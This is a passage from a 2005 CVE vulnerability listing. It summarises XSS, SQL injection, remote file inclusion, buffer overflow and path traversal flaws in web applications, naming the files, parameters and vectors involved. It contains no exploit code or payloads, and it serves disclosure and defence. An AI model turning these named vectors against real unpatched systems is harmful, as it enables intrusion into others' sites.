file outside of the web document root. [CVE-2005-1360] PHP remote file inclusion vulnerability in error.php in GrayCMS 1.1 allows remote attackers to execute arbitrary PHP code by modifying the path_prefix parameter to reference a URL on a remote web server that contains the code. [CVE-2005-1359] Cross-site scripting (XSS) vulnerability in text.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument. [CVE-2005-1356] Cross-site scripting (XSS) vulnerability in includer.cgi script in The Includer allows remote attackers to inject arbitrary web script or HTML via the argument. [CVE-2005-1352] Cross-site scripting (XSS) vulnerability in the ad.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument. [CVE-2005-1346] Multiple Symantec AntiVirus products, including Norton AntiVirus 2005 11.0.0, Web Security Web Security 3.0.1.72, Mail Security for SMTP 4.0.5.66, AntiVirus Scan Engine 4.3.7.27, SAV/Filter for Domino NT 3.1.1.87, and Mail Security for Exchange 4.5.4.743, when running on Windows, allows remote attackers to cause a denial of service (component crash) and avoid detection via a crafted RAR file. [CVE-2005-1327] Cross-site scripting (XSS) vulnerability in pms.php for Woltlab Burning Board 2.3.1 PL2 and earlier allows remote attackers to inject arbitrary web script or HTML via the folderid parameter. [CVE-2005-1324] Multiple cross-site scripting (XSS) vulnerabilities in index.php for phpMyVisites allow remote attackers to inject arbitrary web script or HTML via the (1) part, (2) per, or (3) site parameters. [CVE-2005-1322] Cross-site scripting (XSS) vulnerability in Horde Nag Task List Manager before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1321] Cross-site scripting (XSS) vulnerability in Horde Vacation module before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1320] Cross-site scripting (XSS) vulnerability in Horde Mnemo Note Manager before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1319] Cross-site scripting (XSS) vulnerability in Horde IMP Webmail client before 3.2.8 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1318] Cross-site scripting (XSS) vulnerability in Horde Forwards E-Mail Forwarding Manager before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1317] Cross-site scripting (XSS) vulnerability in Horde Chora module before 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1316] Cross-site scripting (XSS) vulnerability in Horde Accounts module before 2.1.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1315] Cross-site scripting (XSS) vulnerability in Horde Turba module before 1.2.5 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1314] Cross-site scripting (XSS) vulnerability in Horde Kronolith module before 1.1.4 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1313] Cross-site scripting (XSS) vulnerability in Horde Passwd module before 2.2.2 allows remote attackers to inject arbitrary web script or HTML via the parent's frame page title. [CVE-2005-1311] Cross-site scripting (XSS) vulnerability in Yappa-NG before 2.3.2 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1309] Cross-site scripting (XSS) vulnerability in bBlog 0.7.4 allows remote attackers to inject arbitrary web script or HTML via the (1) entry title field or (2) comment body text. [CVE-2005-1308] SqWebMail allows remote attackers to inject arbitrary web script or HTML via CRLF sequences in the redirect parameter followed by the desired script or HTML. [CVE-2005-1301] nProtect:Netizen 2005.3.17.1 does not properly verify that the update module is downloaded from an authorized site, which allows remote malicious web sites to write arbitrary files. [CVE-2005-1300] Cross-site scripting (XSS) vulnerability in the inserter.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument. [CVE-2005-1297] Cross-site scripting (XSS) vulnerability in the include.cgi script allows remote attackers to inject arbitrary web script or HTML via the argument. [CVE-2005-1292] Multiple cross-site scripting (XSS) vulnerabilities in CartWIZ ASP Cart allow remote attackers to inject arbitrary web script or HTML via the idProduct parameter to (1) tellAFriend.asp or (2) addToWishlist.asp, redirect parameter to (3) access.asp or (4) login.asp, message parameter to (5) login.asp or (6) error.asp, or (7) sku or (8) name parameter to searchResults.asp. [CVE-2005-1290] Multiple cross-site scripting (XSS) vulnerabilities in phpBB 2.0.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) u parameter to profile.php, (2) highlight parameter to viewtopic.php, or (3) forumname or forumdesc parameters to admin_forums.php. [CVE-2005-1285] Cross-site scripting (XSS) vulnerability in thread.php in WoltLab Burning Board 2.3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the hilight parameter. [CVE-2005-1274] Stack-based buffer overflow in the getIfHeader function in the WebDAV functionality in MySQL MaxDB before 7.5.00.26 allows remote attackers to execute arbitrary code via an HTTP unlock request and a long "If" parameter. [CVE-2005-1252] Directory traversal vulnerability in the Web Calendaring server in Ipswitch Imail 8.13, and other versions before IMail Server 8.2 Hotfix 2, allows remote attackers to read arbitrary files via "..\" (dot dot backslash) sequences in the query string argument in a GET request to a non-existent .jsp file. [CVE-2005-1250] SQL injection vulnerability in the logon screen of the web front end (NmConsole/Login.asp) for IpSwitch WhatsUp Professional 2005 SP1 allows remote attackers to execute arbitrary SQL commands via the (1) User Name field (sUserName parameter) or (2) Password (sPassword parameter). [CVE-2005-1247] webadmin.exe in Novell Nsure Audit 1.0.1 allows remote attackers to cause a denial of service via malformed ASN.1 packets in corrupt client certificates to an SSL server, as demonstrated using an exploit for the OpenSSL ASN.1 parsing vulnerability. [CVE-2005-1245] Cross-site scripting (XSS) vulnerability in MediaWiki before 1.4.2, when using HTML Tidy ($wgUseTidy), allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-1233] Cross-site scripting (XSS) vulnerability in index.php in PHP Labs proFile allows remote attackers to inject arbitrary web script or HTML via the (1) dir or (2) file parameters. [CVE-2005-1232] Buffer overflow in Sun Java System Web Proxy Server (aka Sun ONE Proxy Server) 3.6 SP6 allows remote attackers to execute arbitrary code via unknown vectors. [CVE-2005-1231] Cross-site scripting (XSS) vulnerability in the NewTerm function in GlossaryModel.php in JAWS 0.4 allows remote attackers to inject arbitrary web script or HTML via the (1) term or (2) description. [CVE-2005-1227] Cross-site scripting (XSS) vulnerability in PHProjekt 4.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the chatroom text submission form. [CVE-2005-1214] Microsoft Agent allows remote attackers to spoof trusted Internet content and execute arbitrary code by disguising security prompts on a malicious Web page. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1202] Multiple cross-site scripting (XSS) vulnerabilities in eGroupware before 1.0.0.007 allow remote attackers to inject arbitrary web script or HTML via the (1) ab_id, (2) page, (3) type, or (4) lang parameter to index.php or (5) category_id parameter. [CVE-2005-1200] PHP remote file inclusion vulnerability in main_index.php in AZ Bulletin Board (AZbb) 1.0.07a through 1.0.07c allows remote attackers to execute arbitrary PHP code by modifying the (1) dir_src or (2) abs_layer parameter to reference a URL on a remote web server that contains the code. [CVE-2005-1191] The Web View DLL (webvw.dll), as used in Windows Explorer on Windows 2000 systems, does not properly filter an apostrophe ("'") in the author name in a document, which allows attackers to execute arbitrary script via extra attributes when Web View constructs a mailto: link for the preview pane when the user selects the file. [CVE-2005-1190] WebcamXP PRO v2.16.468 and earlier allows remote attackers to cause a denial of service via a long chat name, which takes up too much display space and prevents the chat frame from being properly rendered. [CVE-2005-1189] Cross-site scripting (XSS) vulnerability in WebcamXP PRO v2.16.468 and earlier allows remote attackers to inject arbitrary web script or HTML via the chat name, as demonstrated by using an IFRAME to redirect users to other sites. [CVE-2005-1188] Cross-site scripting (XSS) vulnerability in comersus_searchItem.asp in Comersus 3.90 to 4.51 allows remote attackers to inject arbitrary web script or HTML via the curPage parameter. [CVE-2005-1183] Cross-site scripting (XSS) vulnerability in mvnForum 1.0 RC4 allows remote attackers to inject arbitrary web script or HTML via the Search parameter. [CVE-2005-1181] DISPUTED NOTE: this issue has been disputed by the vendor. PHP remote code injection vulnerability in loader.php for Ariadne CMS 2.4 allows remote attackers to execute arbitrary PHP code by modifying the ariadne parameter to reference a URL on a remote web server that contains the code. NOTE: the vendor has disputed this issue, saying that loader.php first requires the "ariadne.inc" file, which defines the $ariadne variable, and thus it cannot be modified by an attacker. In addition, CVE personnel have partially verified the dispute via source code inspection of Ariadne 2.4 as available on July 5, 2005. [CVE-2005-1180] HTTP Response Splitting vulnerability in the Surveys module in PHP-Nuke 7.6 allows remote attackers to spoof web content and poison web caches via hex-encoded CRLF ("%0d%0a") sequences in the forwarder parameter. [CVE-2005-1179] Unknown vulnerability in Xerox MicroServer Web Server for various WorkCentre products including M35/M45/M55 2.028.11.000 through 2.97.20.032 and 4.84.16.000 through 4.97.20.032, Pro 35/45/55 3.028.11.000 through 3.97.20.032, Pro 65/75/90 1.001.00.060 through 1.001.02.084, and others, related to SNMP authentication, allows remote attackers to modify system configuration, a different vulnerability than CVE-2005-0703. [CVE-2005-1177] Unknown vulnerability in (1) Webmin and (2) Usermin before 1.200 causes Webmin to change permissions and ownership of configuration files, with unknown impact. [CVE-2005-1173] Buffer overflow in PMSoftware Simple Web Server 1.0 allows remote attackers to execute arbitrary code via a long GET request. [CVE-2005-1172] Cross-site scripting (XSS) vulnerability in init.inc.php in Coppermine Photo Gallery 1.3.x allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For parameter. [CVE-2005-1171] Cross-site scripting (XSS) vulnerability in mod.php in the datenbank module for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-1162] Multiple cross-site scripting (XSS) vulnerabilities in OneWorldStore allow remote attackers to inject arbitrary web script or HTML via the (1) sEmail parameter to owContactUs.asp, (2) bSub parameter to owListProduct.asp, or the (3) Name, (4) Email, or (5) Comment fields in owProductDetail.asp. [CVE-2005-1150] Unknown vulnerability in Sun Java System Web Server 6.0 SP7 and earlier, when running on Windows systems, allows attackers to cause a denial of service (hang). [CVE-2005-1146] DISPUTED NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in the login command in calendar.pl in CalendarScript 3.21 allows remote attackers to inject arbitrary web script or HTML via the username parameter, a different vulnerability than CVE-2005-1145. [CVE-2005-1145] DISPUTED NOTE: this issue has been disputed by the vendor. Cross-site scripting (XSS) vulnerability in calendar.pl in CalendarScript 3.20 allows remote attackers to inject arbitrary web script or HTML via the template parameter, a different vulnerability than CVE-2005-1146. [CVE-2005-1144] popup.php in EasyPHPCalendar before 6.2.8 allows remote attackers to obtain sensitive information via an invalid ev parameter, which reveals the full pathname of the web server in a PHP error message. [CVE-2005-1143] Cross-site scripting (XSS) vulnerability in index.php in EasyPHPCalendar before 6.2.8 allows remote attackers to inject arbitrary web script or HTML via the yr parameter. [CVE-2005-1140] Cross-site scripting (XSS) vulnerability in myBloggie 2.1.1 allows remote attackers to inject arbitrary web script or HTML via the comments. [CVE-2005-1138] Unknown vulnerability in WebMail in Kerio MailServer before 6.0.9 allows remote attackers to cause a denial of service (CPU consumption) via certain e-mail messages. [CVE-2005-1136] Simple PHP Blog (sphpBlog) 0.4.0 stores the (1) password.txt and (2) config.txt files under the web document root, which allows remote attackers to obtain sensitive information and crack passwords via a direct request to these files. [CVE-2005-1135] Cross-site scripting (XSS) vulnerability in search.php for Simple PHP Blog (sphpBlog) 0.4.0 allows remote attackers to inject arbitrary web script or HTML via the q parameter. [CVE-2005-1130] Cross-site scripting (XSS) vulnerability in index.php in Pinnacle Cart allows remote attackers to inject arbitrary web script or HTML via the pg parameter. [CVE-2005-1120] Multiple cross-site scripting (XSS) vulnerabilities in IlohaMail 0.8.14 and earlier allow remote attackers to inject arbitrary web script or HTML via the e-mail (1) body, (2) filename, or (3) MIME type. [CVE-2005-1118] Cross-site scripting (XSS) vulnerability in IISWebAgentIF.dll in the RSA Authentication Agent for Web 5.2 allows remote attackers to inject arbitrary web script or HTML via the postdata parameter. [CVE-2005-1117] PHP remote file inclusion vulnerability in index.php in All4WWW-Homepagecreator 1.0a allows remote attackers to execute arbitrary PHP code by modifying the site parameter to reference a URL on a remote web server that contains the code. [CVE-2005-1116] Cross-site scripting (XSS) vulnerability in the Calendar module for phpBB allow remote attackers to inject arbitrary web script or HTML via the start parameter to calendar_scheduler.php. [CVE-2005-1115] Multiple cross-site scripting (XSS) vulnerabilities in Photo Album 2.0.53 module for phpBB allow remote attackers to inject arbitrary web script or HTML via the bsid parameter to (1) album_cat.php or (2) album_comment.php. [CVE-2005-1113] Multiple cross-site scripting (XSS) vulnerabilities in PhpBB Plus 1.52 and earlier allow remote attackers to inject arbitrary web script or HTML via the bsid parameter to (1) groupcp.php, (2) index.php, (3) portal.php, (4) viewforum.php, or (5) viewtopic.php, (6) the c parameter to index.php, or (7) the article parameter to portal.php. [CVE-2005-1112] IBM WebSphere Application Server 6.0 and earlier, when sharing the document root of the web server, allows remote attackers to obtain the source code for Java Server Pages (.jsp) via an HTTP request with an invalid Host header, which causes the page to be processed by the web server instead of the JSP engine. [CVE-2005-1104] Multiple cross-site scripting (XSS) vulnerabilities in Centra 7 allow remote attackers to inject arbitrary web script or HTML via the (1) username, (2) first name, or (3) last name fields. [CVE-2005-1099] Multiple buffer overflows in the HandleChild function in server.c in Greylisting daemon (GLD) 1.3 and 1.4, when GLD is listening on a network interface, allow remote attackers to execute arbitrary code. [CVE-2005-1095] Cross-site scripting (XSS) vulnerability in main.asp for Ocean12 Membership Manager Pro 1.x allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2005-1085] Cross-site scripting (XSS) vulnerability in the control panel in aeDating 3.2 allows remote attackers to inject arbitrary web script or HTML. [CVE-2005-1081] Cross-site scripting (XSS) vulnerability in view.php in AzDGDatingPlatinum 1.1.0 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-1077] Multiple cross-site scripting (XSS) vulnerabilities in XAMPP 1.4.x allow remote attackers to inject arbitrary web script or HTML via (1) cds.php, (2) Guestbook-EN.pl, or (3) phonebook.php. [CVE-2005-1076] Cross-site scripting (XSS) vulnerability in the discussion board functionality for WebCT Campus Edition 4.1 allows remote attackers to inject arbitrary web script or HTML via the message field. [CVE-2005-1075] Multiple cross-site scripting (XSS) vulnerabilities in RadScripts RadBids Gold 2 allow remote attackers to inject arbitrary web script or HTML via (1) the farea parameter to faq.php or the (2) cat, (3) order, or (4) area parameters to index.php. [CVE-2005-1072] Cross-site scripting (XSS) vulnerability in PunBB before 1.2.5 allows remote attackers to inject arbitrary web script or HTML. [CVE-2005-1071] SQL injection vulnerability in banner.inc.php in JPortal Web Portal 2.3.1 allows remote attackers to execute arbitrary SQL commands via the haslo parameter. [CVE-2005-1055] TowerBlog 0.6 and earlier stores the login data file under the web root, which allows remote attackers to obtain the MD5 checksums of the username and password via a direct request to the _dat/login file. [CVE-2005-1054] PHP remote file inclusion vulnerability in news.php in ModernBill 4.3.0 and earlier allows remote attackers to execute arbitrary PHP code by modifying the DIR parameter to reference a URL on a remote web server that contains the code. [CVE-2005-1053] Multiple cross-site scripting (XSS) vulnerabilities in orderwiz.php in ModernBill 4.3.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) c_code or (2) aid parameters. [CVE-2005-1052] Microsoft Outlook 2003 and Outlook Web Access (OWA) 2003 do not properly display comma separated addresses in the From field in an e-mail message, which could allow remote attackers to spoof e-mail addresses. [CVE-2005-1049] Multiple cross-site scripting vulnerabilities in PostNuke 0.760-RC3 allow remote attackers to inject arbitrary web script or HTML via the (1) module parameter to admin.php or (2) op parameter to user.php. NOTE: the vendor reports that certain issues could not be reproduced for 760 RC3, or for .750. However, the op/user.php issue exists when the pnAntiCracker setting is disabled. [CVE-2005-1030] Multiple cross-site scripting (XSS) vulnerabilities in Active Auction House allow remote attackers to inject arbitrary web script or HTML via the (1) ReturnURL, (2) password, (3) username parameter, (4) ReturnURL parameter to account.asp, (5) Table, (6) Title parameter to sendpassword.asp, or (7) itemid to watchthisitem.asp. [CVE-2005-1027] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x through 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) username parameter in the Your_Account module, (2) avatarcategory parameter in the Your_Account module, or (3) lid parameter in the Downloads module. [CVE-2005-1023] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 6.x to 7.6 allow remote attackers to inject arbitrary web script or HTML via the (1) min parameter to the Search module, (2) the categories parameter to the FAQ module, or (3) the ltr parameter to the Encyclopedia module. NOTE: the bid parameter issue in banners.php is already an item in CVE-2005-1000. [CVE-2005-1022] ColdFusion 6.1 Updater 1 places Java .class files under the web root in the /WEB-INF/cfclasses directory, which allows remote attackers to obtain sensitive information. [CVE-2005-1017] SQL injection vulnerability in the Update_Events function in events_functions.asp in MaxWebPortal 1.33 and earlier allows remote attackers to execute arbitrary SQL commands via the EVENT_ID parameter, as demonstrated using events.asp. [CVE-2005-1016] Cross-site scripting (XSS) vulnerability in links_add_form.asp for MaxWebPortal 1.33 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript URL in a banner URL. [CVE-2005-1012] Cross-site scripting (XSS) vulnerability in Iatek SiteEnable allows remote attackers to inject arbitrary web script or HTML via (1) the contenttype parameter to content.asp, (2) the title, or (3) the description. [CVE-2005-1010] Cross-site scripting (XSS) vulnerability in Comersus Cart 6 allows remote attackers to inject arbitrary web script or HTML via the account username. [CVE-2005-1008] Cross-site scripting (XSS) vulnerability in posts.asp for ASP-DEv XM Forum RC3 allows remote attackers to inject arbitrary web script or HTML via a "javascript:" URL in an IMG tag. [CVE-2005-1006] Multiple cross-site scripting (XSS) vulnerabilities in SonicWALL SOHO 5.1.7.0 allow remote attackers to inject arbitrary web script or HTML via (1) the URL or (2) the user login name, which is not filtered when the administrator views the log file. [CVE-2005-1004] Cross-site scripting (XSS) vulnerability in usrdetails.php in ProfitCode PayProCart 3.0 allows remote attackers to inject arbitrary web script or HTML via the sgnuptype parameter. [CVE-2005-1002] logwebftbs2000.exe in Logics Software File Transfer (LOG-FT) allows remote attackers to read arbitrary files via modified (1) VAR_FT_LANG and (2) VAR_FT_TMPL parameters. [CVE-2005-1001] PHP-Nuke 7.6 allows remote attackers to obtain sensitive information via direct requests to (1) the Surveys module with the file parameter set to comments or (2) 3D-Fantasy/theme.php, which leaks the full pathname of the web server in a PHP error message. [CVE-2005-1000] Multiple cross-site scripting (XSS) vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the bid parameter to the EmailStats op in banners.pgp, (2) the ratenum parameter in the TopRated and MostPopular actions in the Web_Links module, (3) the ttitle parameter in the viewlinkdetails, viewlinkeditorial, viewlinkcomments, and ratelink actions in the Web_Links module, or (4) the username parameter in the Your_Account module. [CVE-2005-0998] The Web_Links module for PHP-Nuke 7.6 allows remote attackers to obtain sensitive information via an invalid show parameter, which triggers a division by zero PHP error that leaks the full pathname of the server. [CVE-2005-0997] Multiple SQL injection vulnerabilities in the Web_Links module for PHP-Nuke 7.6 allow remote attackers to execute arbitrary SQL commands via (1) the email or url parameters in the Add function, (2) the url parameter in the modifylinkrequestS function, (3) the orderby or min parameters in the viewlink function, (4) the orderby, min, or show parameters in the search function, or (5) the ratenum parameter in the MostPopular function. [CVE-2005-0996] Multiple SQL injection vulnerabilities in the Downloads module for PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via (1) the email or url parameters in the Add function, (2) the min parameter in the viewsdownload function, or (3) the min parameter in the search function. [CVE-2005-0995] Multiple cross-site scripting (XSS) vulnerabilities in ProductCart 2.7 allow remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter to advSearch_h.asp, (2) the redirectUrl parameter to NewCust.asp, (3) the country parameter to storelocator_submit.asp, or (4) the error parameter to techErr.asp. NOTE: it has been reported that storelocator_submit.asp does not exist in ProductCart. [CVE-2005-0992] Cross-site scripting (XSS) vulnerability in index.php in phpMyAdmin before 2.6.2-rc1 allows remote attackers to inject arbitrary web script or HTML via the convcharset parameter. [CVE-2005-0986] NLSCCSTR.DLL in the web service in IBM Lotus Domino Server 6.5.1, 6.0.3, and possibly other versions allows remote attackers to cause a denial of service (deep recursion and nHTTP.exe process crash) via a long GET request containing UNICODE decimal value 430 characters, which causes the stack to be exhausted. NOTE: IBM has reported that it is unable to replicate this issue. [CVE-2005-0982] Multiple cross-site scripting (XSS) vulnerabilities in Yet Another Forum.net 0.9.9 allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) location, or (3) Subject field. [CVE-2005-0981] Multiple cross-site scripting (XSS) vulnerabilities in AlstraSoft EPay Pro 2.0 allow remote attackers to inject arbitrary web script or HTML via the (1) payment or (2) send parameter. [CVE-2005-0980] PHP remote file inclusion vulnerability in index.php in AlstraSoft EPay Pro 2.0 allows remote attackers to execute arbitrary PHP code by modifying the view parameter to reference a URL on a remote web server that contains the code. [CVE-2005-0976] AppleWebKit (WebCore and WebKit), as used in multiple products such as Safari 1.2 and OmniGroup OmniWeb 5.1, allows remote attackers to read arbitrary files via the XMLHttpRequest Javascript component, as demonstrated using automatically mounted disk images and file:// URLs. [CVE-2005-0961] Cross-site scripting (XSS) vulnerability in Horde 3.0.4 before 3.0.4-RC2 allows remote attackers to inject arbitrary web script or HTML via the parent frame title. [CVE-2005-0952] Cross-site scripting vulnerability in pafiledb.php in PaFileDB 3.1 allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-0949] Multiple cross-site scripting (XSS) vulnerabilities in content.asp in Iatek PortalApp allow remote attackers to inject arbitrary web script or HTML via the (1) contenttype or (2) keywords parameter. [CVE-2005-0945] Cross-site scripting (XSS) vulnerability in ACS Blog 1.1.1 allows remote attackers to inject arbitrary web script or HTML via onmouseover or onload events in (1) img, (2) link, or (3) mail tags. [CVE-2005-0938] Ublog Reload 1.0 through 1.0.4 stores ublogreload.mdb under the web root, which allows remote attackers to read usernames and hashed passwords via a direct request to ublogreload.mdb. [CVE-2005-0936] Cross-site scripting vulnerability in products1h.php in ESMI PayPal Storefront allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2005-0934] Multiple cross-site scripting (XSS) vulnerabilities in WackoWiki R4 allow remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-0930] Cross-site scripting (XSS) vulnerability in message.php in Chatness 2.5.1 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the user field or (2) the message parameter to message.php. [CVE-2005-0928] Multiple cross-site scripting (XSS) vulnerabilities in PhotoPost PHP Pro 5.x allow remote attackers to inject arbitrary web script or HTML via the (1) cat, (2) password, (3) ppuser, (4) sort, or (5) si parameters to showgallery.php, the (6) ppuser, (7) sort, or (8) si parameters to showmembers.php, or (9) the photo parameter to slideshow.php. [CVE-2005-0927] Unknown vulnerability in subs.pl for WebAPP 0.9.9 through 0.9.9.2 has unknown impact and attack vectors, probably involving shell metacharacters or .. sequences. [CVE-2005-0925] Cross-site scripting (XSS) vulnerability in login.asp for Ublog Reload 1.0 through 1.0.4 allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2005-0924] Cross-site scripting (XSS) vulnerability in Adventia E-Data 2.0 allows remote attackers to inject arbitrary web script or HTML via a query keyword. [CVE-2005-0919] Adventia Chat 3.1 and Server Pro 3.0 allows remote attackers to inject arbitrary web script or HTML into the chat space, which leaves other users vulnerable to cross-site scripting (XSS) attacks. [CVE-2005-0918] The NPSVG3.dll ActiveX control for Adobe SVG Viewer 3.02 and earlier, when running on Internet Explorer, allows remote attackers to determine the existence of arbitrary files by setting the src property to the target filename and using Javascript to determine if the web page immediately stops loading, which indicates whether the file exists or not. [CVE-2005-0915] Webmasters-Debutants WD Guestbook 2.8 allows remote attackers to bypass authentication and perform certain administrator actions via a direct HTTP POST request to (1) ajout_admin2.php or (2) suppr.php. [CVE-2005-0914] Multiple cross-site scripting (XSS) vulnerabilities in CPG Dragonfly 9.0.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) the profile parameter to index.php or (2) the cat parameter. [CVE-2005-0910] Multiple cross-site scripting (XSS) vulnerabilities in exoops allow remote attackers to inject arbitrary web script or HTML via (1) the sortdays parameter to viewforum.php or (2) the viewcat parameter to index.php. [CVE-2005-0908] Multiple cross-site scripting (XSS) vulnerabilities in Valdersoft Shopping Cart 3.0 allow remote attackers to inject arbitrary web script or HTML via (1) the lang parameter to index.php or (2) the searchTopCategoryID parameter to search_result.php. [CVE-2005-0905] Maxthon 1.2.0 allows remote malicious web sites to obtain potentially sensitive data from the search bar via the m2_search_text property. [CVE-2005-0901] Multiple cross-site scripting (XSS) vulnerabilities in NukeBookmarks 0.6 for PHP-Nuke allow remote attackers to inject arbitrary web script or HTML via the (1) catname, (2) markname, (3) comment, or (4) category parameter. [CVE-2005-0898] Cross-site scripting (XSS) vulnerability in downloadform.php in E-Store Kit-2 PayPal Edition allows remote attackers to inject arbitrary web script or HTML via the txn_id parameter. [CVE-2005-0897] PHP remote file inclusion vulnerability in catalog.php in E-Store Kit-2 PayPal Edition allows remote attackers to execute arbitrary PHP code by modifying the menu and main parameters to reference a URL on a remote web server that contains the code. [CVE-2005-0896] Multiple cross-site scripting (XSS) vulnerabilities in review.php in phpMyDirectory 10.1.3-rel allow remote attackers to inject arbitrary web script or HTML via the (1) subcat, (2) page, or (3) subsubcat parameter. [CVE-2005-0889] Cross-site scripting (XSS) vulnerability in index.php for Dream4 Koobi CMS 4.2.3 allows remote attackers to inject arbitrary web script or HTML via the area parameter. [CVE-2005-0888] Multiple cross-site scripting (XSS) vulnerabilities in functions.inc.php for Double Choco Latte 0.9.4.3 allow remote attackers to inject arbitrary web script or HTML via the (1) class or (2) method name. [CVE-2005-0886] Cross-site scripting (XSS) vulnerability in Invision Power Board 2.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via an HTTP POST request. [CVE-2005-0885] Multiple cross-site scripting (XSS) vulnerabilities in XMB Forum 1.9.1 allow remote attackers to inject arbitrary web script or HTML via the (1) Mood or (2) "Send To" fields. [CVE-2005-0883] Multiple cross-site scripting (XSS) vulnerabilities in base.php for DigitalHive 2.0 allow remote attackers to inject arbitrary web script or HTML via (1) the mt parameter to the membres.php page or (2) the -afs-1- query string to the msg.php page. [CVE-2005-0881] Cross-site scripting (XSS) vulnerability in articles.newcomment for Interspire ArticleLive 2005 allows remote attackers to inject arbitrary web script or HTML via the Articleld parameter. [CVE-2005-0878] Cross-site scripting (XSS) vulnerability in MercuryBoard before 1.1.3 allows remote attackers to inject arbitrary web script or HTML via the title field of a PM (private message). [CVE-2005-0875] Multiple buffer overflows in the Yahoo plug-in for Trillian 2.0, 3.0, and 3.1 allow remote web servers to cause a denial of service (application crash) via a long string in an HTTP 1.1 response header. [CVE-2005-0874] Multiple buffer overflows in the (1) AIM, (2) MSN, (3) RSS, and other plug-ins for Trillian 2.0 allow remote web servers to cause a denial of service (application crash) via a long string in an HTTP 1.1 response header. [CVE-2005-0873] Multiple cross-site scripting (XSS) vulnerabilities in test.jsp in Oracle Reports Server 10g (9.0.4.3.3) allow remote attackers to inject arbitrary web script or HTML via the (1) desname or (2) repprod parameter. [CVE-2005-0872] Cross-site scripting (XSS) vulnerability in calendar_scheduler.php in the Topic Calendar 1.0.1 module for phpBB allows remote attackers to inject arbitrary web script or HTML via the start parameter. [CVE-2005-0870] Multiple cross-site scripting (XSS) vulnerabilities in phpSysInfo 2.3, when register_globals is enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) sensor_program parameter to index.php, (2) text[language], (3) text[template], or (4) hide_picklist parameter to system_footer.php. [CVE-2005-0864] The Boa web server, as used in Samsung ADSL Modem SMDK8947v1.2 and possibly other products, allows remote attackers to read arbitrary files via a full pathname in the HTTP request. [CVE-2005-0863] Cross-site scripting (XSS) vulnerability in PHPOpenChat v3.x allows remote attackers to inject arbitrary web script or HTML via (1) the chatter parameter to regulars.php or (2) the chatter, chatter1, chatter2, chatter3, or chatter4 parameters to register.php. [CVE-2005-0857] Cross-site scripting (XSS) vulnerability in avatar.php for CoolForum 0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the img parameter. [CVE-2005-0853] betaparticle blog (bp blog) stores the database under the web root, which allows remote attackers to obtain sensitive information via a direct request to (1) dbBlogMX.mdb for versions before 3.0, or (2) Blog.mdb for versions 3.0 and later. NOTE: it was later reported that vector 2 also affects versions 6.0 through 9.0. [CVE-2005-0846] Multiple cross-site scripting (XSS) vulnerabilities in the email auto-reply message in SurgeMail 2.2g3 allow remote attackers to inject arbitrary web script or HTML via the (1) message subject or (2) message header field. [CVE-2005-0842] Cross-site scripting (XSS) vulnerability in index.php in Kayako eSupport 2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) _i or (2) _c parameter. [CVE-2005-0836] Argument injection vulnerability in Java Web Start for J2SE 1.4.2 up to 1.4.2_06 allows untrusted applications to gain privileges via the value parameter of a property tag in a JNLP file. [CVE-2005-0832] Cross-site scripting (XSS) vulnerability in PHP-Post before 0.33 allows remote attackers to inject arbitrary web script or HTML via unknown vectors. [CVE-2005-0829] Cross-site scripting (XSS) vulnerability in setuser.php of the Digitanium addon to PHP-Fusion 5.01 allows remote attackers to inject arbitrary web script or HTML via the (1) user_name or (2) user_pass parameters. [CVE-2005-0820] Microsoft Office InfoPath 2003 SP1 includes sensitive information in the Manifest.xsf file in a custom .xsn form, which allows attackers to obtain printer and network information, obtain the database name, username, and password, or obtain the internal web server name. [CVE-2005-0818] Cross-site scripting (XSS) vulnerability in PunBB 1.2.3 allows remote attackers to inject arbitrary web script or HTML via the (1) email or (2) Jabber parameters. [CVE-2005-0802] Cross-site scripting (XSS) vulnerability in search.asp in ACS Blog 0.8 through 1.1b allows remote attackers to execute arbitrary web script or HTML via the search parameter. [CVE-2005-0800] PHP remote file inclusion vulnerability 